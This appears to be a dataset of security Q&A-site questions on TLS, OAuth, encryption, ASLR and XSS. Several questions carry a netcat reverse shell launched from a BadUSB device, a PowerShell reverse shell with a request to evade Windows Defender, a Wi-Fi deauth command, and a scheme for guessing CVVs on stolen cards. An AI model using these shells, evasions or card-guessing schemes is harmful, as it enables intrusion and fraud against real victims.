instruction
stringlengths
24
29.9k
I am developing an android application and in the future also for IOS, and I use a server in PHP. Is it possible for my server to know the source of the application sending the requests? For example, if someone modifies the apk of my application and creates another one, they may have access to all the security data tha...
I try to run a deauthentication attack: aireplay-ng --deauth 100000 -a 06:CB:51:F8:6B:5F -c 64:89:F1:07:CC:4B wlan0 but it shows me this error: 15:19:28 Waiting for beacon frame (BSSID: 06:CB:51:F8:6B:5F) on channel 44 15:19:38 No such BSSID available. what should I do? This bssid is valid and has like 5 of my hous...
Reading this question about extracting PDF password hashes to feed into john the ripper has me wondering why password hashes are in a PDF in the first place? Shouldn't it be using the supplied password to derive a symmetric key, and then decrypt the contents of the PDF? UPDATE: this question explains that PDF encrypti...
I am trying to figure out whether it's safe to let a payed software check its own license date validity using the client's computer the way this is done is by invoking time.time() function from python and comparing it to the hashed license expiry date. if the time.time() returns anything after the expiry date than the ...
Let's assume that a client has the client secret exposed somewhere. What are the risks that the client and its users are exposed to? Are those the same as having implemented the implicit flow from the begin with? I would say that, the risk here is for an attacker stealing a code, and since the client secret is availab...
First, some background: The DNS-01 verification method of Let's Encrypt requires you to add a TXT record to a special subdomain your domain name to prove your identity. With ACMEv2, this can allow you to get a wildcard certificate, which worries me (see below). The HTTP-01 verification method proves your identity by re...
I wonder what is the volume of traffic, in terms of requests/second, forms a legit DDoS attack against a website. I know it highly depends on the website and where it is hosted. But is there any real-world example that at least gives some numbers. For example, for 10M request/second, what size of website can be taken d...
Can an expert please explain me which of following three methods working with an OS is technically considered more "secure" - and why (pros/cons)? Security I mean aspects like: -preventing any malware to "swap" over to the other drives of the computer -web browsing -preventing traces of data from being read by the o...
Grimes and Elon Musk named their baby: X Æ A-12. What are the risks of non-ASCII names? For example, does the COBOL unemployment platform support non-ASCII names? Would it be possible to get a social security number (SSN) for the baby? Does it make their baby an easier target to impersonation attacks using Unicode man...
I lost my computer and I need to find it. I know IP address of computer. How to find location of computer from IP address? Thank you in advance.
A service or library provides a function decrypt( user_id, cypher_text) and gives back plain text. Internally to the function it loads an AES key from a secure vault, decrypts the cypher_text, and returns the plain text. If an attacker gets access to this function alone, but doesn’t know any valid cyphertext, can they ...
I have multiple IoT devices that will be connected to a cloud based platform in order to control these devices (IoT node running baremetal arm SoC). These IoT nodes would be deployed and, during configuration, they would create a secure communication channel with backend generating a synmmetric key (one symmetric key p...
GnuPG seems to have number of different ways to refer to a (sub)key(pair): Key IDs Fingerprints Keygrips Additionally, gpg --list-sigs seems to show hexadecimal identifiers for signatures and such as well. Sometimes such IDs are abbreviated. All of this is quite confusing, and I hope someone can shed some light on th...
I'm automating XSS security test, I automated XSS reflected and stored, now for automating XSS dom I'm required to use XSSStrike tool (https://github.com/s0md3v/XSStrike/wiki/Usage). Im using Selenium to automated the business logic (login) get cookies and store cookies in json and txt file. however when I provide the...
i assume typical android has fully encrypted disk with a key stored in a header. header is encrypted using pin / pattern / fingerprint or not encrypted when there is no lock. is that correct? when the phone is on, a thief can use the OS to access the data. pin and pattern accepting delay will be sufficient. also all th...
If I am not wrong, visa is easy to guess cvv right? Let's say if I have 100,000 credit card numbers and expiration dates, it is possible to make daily 5 guesses. All cards with 5 the same gateway/Api of payment and cards will not get blocked due to multiple attempts? If yes, then it's possible to create like 10 APIs a...
Suppose I have a server and no-one can hack into my local area network. I want to Remote Desktop into my server from Internet. Exposing RDP is the most foolish thing I did do once and the server was brought down within days. I have configured IKEv2 now to get a local IP, but am regularly facing error 809, which goes aw...
I am working on an E-commerce website which is mainly in Django. I have this admin page. I want to hide, protect, secure it from other users/visitors means that only a set of IP address can view that and login with their credentials. is it possible? I have heard about IP whitelisting but IP's can be faked and also som...
I've been interested in message tracing, so I played a bit with Cisco's Packet Tracer and Wireshark. Is it possible to locate the destination IP of a message (packages) been sent via WhatsApp? I am not trying to read data out of the packages, I just wonder if it is possible to trace the destination location of the mes...
I've been experimenting with the latest Parted Magic Secure Erase to wipe HDDs and SSDs. After the Secure Erase completes, I noticed in the logs that the verification level is 10%. Excerpt from the log: WDC_WD5000AZLX-00JKKA0 (/dev/sda) SERIAL NUMBER: WD-WCC6Z0JJVNY0 SIZE:465.8G RESULTS:Successfully Erased Secure ...
Customer is running Qualys Web Application Scan and the WAS Scan Report reported: 150004 Path-Based Vulnerability on URL: https://www.example.com/mywebapp/Content/datepicker/images/ui-icons_444444_256x240.png I have verified that Directory Browsing is disabled in IIS 10, per How to fix Path Disclosure Vulnerability?. B...
According to this answer, DLL injection through CreateRemoteThread in conjunction with LoadLibraryA can be prevented by hooking LoadLibraryA. I went through the effort of doing an actual implementation of both the attacking side and defending side. I used this article as a baseline for creating both applications. The d...
I understand what the workflow would be from the webpage, but how does oauth+open id work for desktop apps as they cannot open a browser page within the app. I see that when I click on log in with facebook in the spotify app, it opens facebook in the browser and returns the control back to the app once the user interac...
GOAL: the attacker insert into a victim's laptop an USB which act as a keyboard. The payload opens a terminal, executes a reverse shell and hides the terminal. PROBLEM: the tests I did locally (ubuntu 19.04, and digispark as usb) are the following: ONE terminal A nc -e /bin/bash 10.10.10.10 8888 terminal B nc -vlp 8888...
I know that they can't monitor me on my home WiFi, but can they see the websites I visited while on my home WiFi after I reconnect to the schools?
There is a Python client app connecting to a Java server app via a secure socket. The connection works great with a self-signed certificate, however, it fails when I attempt to utilize a given valid certificate signed via a CA. I'm suspicious of the latter certificate's format (certificate structure is brought at the e...
I have set the cipher algorithms for ssh on my server to just chacha20-poly1305@openssh.com, aes256-gcm@openssh.com and aes128-gcm@openssh.com Now my IntelliJ fails with this error: failed: unable to reach a settlement: [aes128-cbc, aes128-ctr, aes192-cbc, aes192-ctr, aes256-cbc, aes256-ctr, blowfish-cbc, blowfish-ctr...
MMOs have been around along time. As a result, there are lots of past attacks on MMOs that we can learn from and apply to a modern MMO. As a security novice, I was wondering if in today's climate you were to create a MMO, would it be possible to create one that is secure for all except the most sophisticated of attack...
I searched for "Adele's weight loss" today and up popped the article "How to support your fat friends?" in my news feed on Medium. I literally have read nothing about fat people on Medium and it just popped up today.
I have an API and an SPA. The SPA is all anonymous but I want to ensure the caller of the API is authorized to do so. It seems that all of the OAuth best practices, e.g. PKCE, depend on a user actually logging in, which will never happen. Am I overthinking this? Both apps are hosted in Azure and I've gone down the pa...
For a long time, I was so convinced that 127.0.0.1/localhost-hosted webpages, that is, with URLs such as: http://127.0.0.1/MySecretControlPanel/sensitive.php?stuff=goes&here=dude ... did not send the "HTTP referrer" header when you click hyperlinks on them. But they do! That is, unless you go out of your way and figur...
while establishing the SSL/TLS based communication in an embedded device, is it necessary that device needs to acquire the keys/certificates from a CA? I read that there is also provision for device to create and use its own key! What are the possible options and safety level associated with each option?
I am a 6th grader working in a project and came across the following question: On most browsers, you can inject JavaScript code into the browser, for example by typing in javascript:alert('Injecting javascript code'). On Google Chrome, if you do this on Google Drive, instead of the title being "drive.google.com says",...
Let's say I create a 100KB file only containing 1234567890, that is, a known value. This file would be sitting on several folders as bait. Once a Rasomware hits the folder and encrypts this file (considering all other forms of anti-rasomware protection failed), could I generate which is the private key that would decry...
Someone had shared a search query they had with friends only to discover the URL had a query parameter called gs_lcp with a long identifier which seems to be base64 encoded. Decoding it to ascii yielded a string that starts with psy-ab and ends with gws-wiz� and has a middle part divides into chunks by : They wonder ...
I've been trying to encourage some people I know to install and use the COVIDsafe app. Some people have raised privacy concerns as a reason to not install the app (there's other concerns, such as it reportedly interfering with diabetes apps). To the best of my knowledge, these people are using smartphones with SIM card...
I'm doing in static analysis of PE file. Can PE file have two or more executable sections? How can we detect whether it is injected or not?
I have a drupal 7 site, but this question is a more generic one. In the logs I'm seeing regular "attacks" to access protected resources. So attackers are just trying. I'm starting to see more sophisticated attacks such as : example.com/user.php?act=login and with a referrer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:...
My data got deleted from iPhone. I tried to recover all images and videos using some third party softwares like dr.fone, stellar, etc but all these apps allow only preview of the data but can't actually save the data in my Windows PC unless we buy it. So I wanted to take disk image of entire iPhone so that I can use F...
Suppose we're using secure boot and remote attestation to prove to a server what client software is talking to it. What stops an attacker from doing this: Start a legitimate copy of the client software on machine A. Get a remote attestation challenge from the server using a modified copy on machine B. Send TPM_Quote t...
I'm using pihole as my DNS on the LAN but I'm trying to use it as my "global" DNS server wherever I am on the planet. One solution is to use a VPN on my LAN and pihole being set as the default DNS for that VPN gateway. It's fine but it may not be possible to mount a VPN tunnel every time for some reasons. So I was thin...
I am currently in situation where I have to decide when to implement security measures. So the question is simple, is it better to implement authorization and authentication methods right off the bat in the beginning of the project, OR at the end of the project, before the first release? Things I considered: at the end...
There are a couple of files / tools which provide file-level encryption. I guess PDF and ZIP are probably the most commonly known ones. I wonder what scenario they actually help with or if it just is a bad solution. For example, if I want to be sure that no man in the middle gets information when I transfer a file over...
All the products supporting TOTP-based 2FA use one of the common authenticator apps such as Google Authenticator, Authy, etc. I want to understand whether there are any security reasons behind why the implementations prefer to use the generic authenticator apps and not build the TOTP code-gen application themselves or...
Last night I was checking my router because I noticed some sluggishness with my connection. I opened a connections monitor and saw my computer was sending significant UDP traffic to an IP address on high port numbers. This wasn't immediately concerning because I was connected to a VPN, but I decided to check if the IP ...
Using OAuth to implement social login is insecure (https://www.rfc-editor.org/rfc/rfc6819#section-4.4.2.6) because OAuth doesn't provide authentication, only authorisation. The issue arises because the local application incorrectly thinks that, because a certain Access Token returns ID information, the user with that I...
I am working on Java application which generate SQL prepared statements and stored procedure query strings using user inputs and executes with PreparedStatement.execute() or CallableStatement.execute() Example: String query = "{? = call UserSuppliedStoredProcName(?,?)}" conn.prepareCall(query) assuming a user can inse...
I tried to use sync.com for it's advertised zero knowledge. But I'm skeptical. If I create a link without a password and share it with a text message, my friend who gets this link is able to download the document and view the content. However my friend doesn't know my password. Therefore, i conclude that once i create ...
The only one I can think of would be if someone exports a backup of their inbox and doesn't encrypt it for some reason. Other than that, is there any case where someone could read your emails from days ago, but not within the past hour? For context, the reason I ask is that some people think that email tokens should ex...
I have following code: #include <stdio.h> #include <stdlib.h> int main() { int *ptr1 = malloc(16); int val1 = 0x12345678; printf("stack: %p\nheap: %p\n", &val1, ptr1); return 0; } Compilation: gcc -fpie -pie main.c I wanted to test how aslr behaves under debugger, so i started gdb sess...
I am working on a security testing project, where I have noticed that the form action of a login page takes whatever is fed to URI as a parameter, the respective part of the login page is as follows: <form action="/admin/login/?param=Whateveryouputhere" method="post" id="login-form"> Actually, you can even omit the "p...
I obfuscated my web software with srcProtector and I archived files, I uploaded a new version of the software on the website. The problem is I forgot to copy files in a new path for backup. VERY VERY BAD! Code looks like: I tried already unPHP. (is there any winscp undo button (reconnect session) or any deobfuscator f...
(There is a highly related question, however I believe mine is not a duplicate, since it deals with resetting a password without access to the account, not changing it while being logged in.) Say someone has gained access to my email that I used to register some accounts with. Assume also that these accounts all have s...
If I flood a C program with bytes can I cause buffer overflow, or is there other stuff I have to take into account?
The title says it all, I was wondering if some malicious code could be placed in the image file (the formats I am concerned with are JPEG, PNG and WEBP, basically the common formats available when you download from google), for example as metadata, so that it would be executed when opened (or simply downloaded but that...
Attacker: Arch Linux Target: Windows 10 Scenario The attackers launches an ARP spoof attack to redirect all target traffic to the attacker. (This works) The target sends DNS queries for domain name resolution to the attacker machine. (This works) The attacker machine listens for this queries and if the query tries to r...
I have observed a path normalization issue in the tomcat when i was passing "..;" in the URL. I tested this out with Nginx and Apache-tomcat-10.0.0-M4. I was able to access file directories which are not allowed in the Nginx. Please find the below screenshots for more information, Nginx Configuration: As per the ab...
How are the GET parameters passed? example I Understand the HTTP Connection is started by browser as below 1) Connect with TCP port 80 2) after connection, pass the following over the connection GET /?parameter=secure_data 3) Receive the data content (Could be text, html, image etc) 4) Display the data Is this th...
I have some troubles to understand how the header "Access-Control-Allow-Origin" can really be secure. Let me explain what I have in mind: Let's say I have an API on api.contoso.com setting this header: Access-Control-Allow-Origin: https://contoso.com The goal is to allow only calls to this API from https://contoso.com....
I have an online application that I'm adding MFA to, using the Google / Microsoft Authenticator apps for mobile phones. I've tried to adopt a security focussed approach to storing the MFA secret and at the moment, that secret is being encrypted using the users password within a database field. We don't store the passwo...
I need to test vulnerability scanners such as Nessus, Nmap, and so on. My teacher told me, that there are some prepared websites (these scanners need the IP address of target to scan) with known vulnerabilities, that can be directly scanned with these scanners, without installing locally on my machine. But I can not fi...
I develop a web application where registered users see each others usernames. Log in is performed via HTTPS Basic Authentication based on correct username/password combination. This way an attacker will only need to guess a users password. Can this be considered a weakness in security? Should I change my login function...
Alice and Bob need to share some cryptographically-secure random numbers. Alice does not trust Bob, and Bob does not trust Alice. Clearly, if Alice generates some numbers, and hands them to Bob, Bob is skeptical that these numbers are, in fact, random, and suspects that Alice has instead generated numbers that are co...
Is it possible to remotely monitor key strokes on a laptop or is an RF retro reflector required? If so, where would be the most likely location such a device would be placed?
I'm developing an API which requires an API key to use. These keys are assigned to users. To figure out which user the key belongs to, I have to store some information in that key. But I don't want it to be seen by "others". So I want to encrypt that value. I was first thinking about making an encryption key for each ...
Does WP(Write Protect) pin of a USB flash memory controller prevent tampering with its firmware? I want to have an USB stick that I can make it read-only and insert it in any untrusted PC without risking a silent BadUSB infection. I was thinking about finding an USB stick that has this WP pin in its controller and DIY ...
According to me, The key here is to use virtualization. This is a main precaution that allows safe handling (isolation) of systems that could otherwise be exploited and leveraged as jump points into an organization infrastructure.
I'm trying to run a powershell reverse shell on windows 10. Anyway everytime it is blocked by Wndows Defender. How can I bypass it? In a file I store the payload $client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Rea...
Suppose I had a file (a pdf file) on an infected windows 10 PC, I use a usb drive to transfer this file from windows 10 to a Macbook. Can this Macbook then be infected? Or become a carrier that infect any other usb drives connected to it?
If I understand it correctly, eCryptfs creates a file in the "lower" directory whose content is a header, plus the encryption of the file in the "upper" directory. But when I create an empty file in the "upper" directory, the file created in the "lower" directory is 8192 bytes. Where is it meaningful when eCryptfs intr...
Let’s say: We buy a domain from http://cheap-unsecure-domains.example. Then in our control panel at cp.cheap-unsecure-domains.example we configure it to use the Cloudflare service. We set some MX record at Cloudflare and point them to Google, for example. In theory it should be possible for cheap-unsecure-domains t...
When connecting using SSH to a shared hosting provider I'm regularly using, I got this message today: WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that the RSA...
To ease the wifi PSK key input, I want to group characters by category, to reduce the number of context switches on various devices. For example HWJt9cR4a3^YEH8^Sj3ix87z^gfD#MuBivJX7UzpMZF8cjw@gsLi$6iRt7ezF## will be turned into ^^^#@$##94383877867HWJRYEHSDMBJXUMZFLRFtcajixzgfuivzpcjwgsiitez when grouping, I shuffle ...
I'm asking this question with the assumption that anything the user can do, so can malware. I'm using a third party firewall on my system to control which programs are able to access the internet. However I notice that I - as a limited user - am able to change the firewall configuration without elevating through UAC. I...
Reading up on the NTP protocol wikipedia page as well as blog posts about NTS, it appears like NTS uses TLS to start the encrypted connection. From what I understand, TLS might not work properly if there is a significant difference in time between the server and client. If so, doesn't using NTS mean that if the client ...
Let's assume Alice is an employee of the Chuck company. Alice likes to communicate with Bob, a server somewhere in the internet. Chuck, being a security orientated company, inspects all TLS connections from its devices by decrypting the traffic. Is there any way for Alice to establish a secure connection to Bob with a ...
I just added a drive to my system which is basically a partition mounted for extra storage. I'd like to encrypt it to protect my data in case of god knows what, and by doing that I'd need to enter the passphrase every time to unlock the partition. I just read that I can add a keyfile so I wouldn't need to manually unlo...
My server sets cookies with the JWT and refresh tokens on login, and likewise when the refresh route is hit. If a valid JWT cookie is found in the request for these routes, should a new one be issued? If so, should the old be blacklisted? And if not, what would be a valid response code?
I have recently identified a security risk with some of the machines (primarily Windows 10 and MacOS laptops) my company issues to users. Specifically, a small subset of the users are regularly placing their device "directly on the Internet" when working remotely. I suspect that this is primarily caused by plugging the...
I am asking specifically about AES CBC mode. Is it safe to assume that an encryption key of length X with N characters known by an attacker is just as secure as a key of length X − N? For example, is the following key: [][][][][]abc (8 chars, 3 known) Exactly as secure as: [][][][][] (5 chars, 0 known) assuming that ...
As we know, network based firewalls will filter based on information such as source IP, source port, etc. But they won't know what program on the source machine is generating that traffic. Complementing a network based firewall there may be a host-based firewall installed on local machines, responsible for controlling ...
Will it make it harder for an attacker to get control of your router?
Some apps (Github being the most prominent IMHO) allow using U2F token as a means of validation for "sudo mode" (potentially dangerous actions in UI like creating a new token) instead of password. Intuitively it seems not very safe as a stolen device will most probably still contain the U2F token. Am I missing somethi...
I thought of a simple way to throw keyloggers off when typing sensitive information into a field, however this method presupposes that the keylogger can't actually read what's in the field, and also that it can't record the exact movements of my mouse and exactly what was on my screen and in what position as I was typi...
The NIST database holds records for Microsoft Office vulnerabilities, however it only lists the application (i.e. Word 2016) and the service pack. Microsoft release hotfixes outside of service packs, therefore the NIST data alone isn't enough to tell if an installation of Office is vulnerable or not. For example CVE-20...
I've been reading about the Pixie Dust attack from various sources, that provide a low-level explanation of how it works. In the values E-Hash1 = HMAC(AuthKey, E-S1 || PSK1 || PKE || PKR) and E-Hash2 = HMAC(AuthKey, E-S2 || PSK2 || PKE || PKR) PKE and PKR are known. PSK1 and PSK2 are the first and last 4 digits of the ...
Banks offer to send alerts for each transaction happening on a customers account. My bank is offering three options: SMS alerts, email alerts and push alerts into their own app. Only sms alerts are free of charge. The other options are a very small fee each time a transaction happens. Could scammers make much out of tr...
I'm new to the ionic framework and have some basics of it and currently I'm developing a private app for my family only that store some sensitive information in the localstorage. I used some crypto libraries to encrypt the whole data to prevent anyone reading it directly. The app does not call any external API, links t...
Background: My team's mobile apps have biometric sign in (Touch ID, Face ID, fingerprint). You can enable and disable biometric sign in when you are signed in. You always have the option to sign in with username and password (and have to in many scenarios, if for instance your fingerprints on the device were updated). ...
On my server, I used to use SSH for one single purpose: remote administration. I am the only administrator. Only I have the required credentials to open a remote shell on the server. I use a pair of keys, a strong password and a one-time password, only my personal IP address is allowed to reach the SSH port and the req...
In the context of contact tracing, I have a privacy question. I have read a few (and "few" is already a bad thing) articles about Bluetooth contact tracing, especially in the context of the Sars-Cov2 pandemic. There are huge privacy concerns in contact tracing. One solution proposed by reasearchers is to use "changing"...
I hope everyone is doing okay. I've built a React.js website which is hosted in a server with SSL, but I'm not sure whether it's secure or not. That's why I decided to ask you for some advice/tips or solutions that will make my website secure. In this app, I require the user to log in. After the user logs in, my app pr...
When testing for XSS, is it at all possible to bypass the below regex? I doubt it because it only accepts uppercase and lowercase letters, but maybe? /^[A-Za-z]+$/
Can Javascript overwrite or delete a HTTPOnly cookie? In more detail: Suppose the user's browser has a cookie for example.com with the HTTPOnly flag set, say session=552..e0. Suppose the user visits a page on example.com. Can Javascript running on that page overwrite the cookie with a new cookie that does not have th...
I would kindly ask you to review the following code and tell me if it's enough to prevent most of SQL injection and XSS attacks. SQL injection: treated via PDO prepared statements; XSS: All user's inputs are parsed in every documents through htmlentities + ENT_QUOTES + 'UTF-8'; Here is an example of my code: <?php ...
I am trying to learn about pivoting/port forwarding and how to take full advantage of it. If I am connected to a network with the ip 192.168.0.10 and can see that 192.168.0.11 has access to a website hosted on 10.10.10.10 I am able to gain access to the webpage using meterpreter by doing: meterpreter> run autoroute -s ...
While using the webex conference software, I noticed that simply pressing a "share content" button allows me to share my full screen. There was no security confirmation from my webbrowser (chrome): I am very reluctant to installing extensions and use essentially a plain webbrowser. As someone who has applications as o...
From what I understand, the idea of FIDO2 is to use symmetric cryptography, with secret key on the token, and public key on the server. When requesting to connect, the server uses the public key to generate a challenge that can only be solved with the private key, i.e., if the user can solve the challenge, he has the t...
Despite the continuous effort in our company to resolve vulnerabilities, we are still reporting a significant number of vulnerabilities after each scan we perform. We would like to understand if there are industry benchmarks or ratios, like number of vulnerabilities per asset out there that we can use to compare ourse...
I recently had to bypass my company policy by establishing a VPN connection from a LAN device (raspberry pi) located inside my company, to a WAN server. As devices accessible from outside must be placed in the DMZ, I couldn't get a proper authorization to do this. In fact, it is too complex and it requires to many app...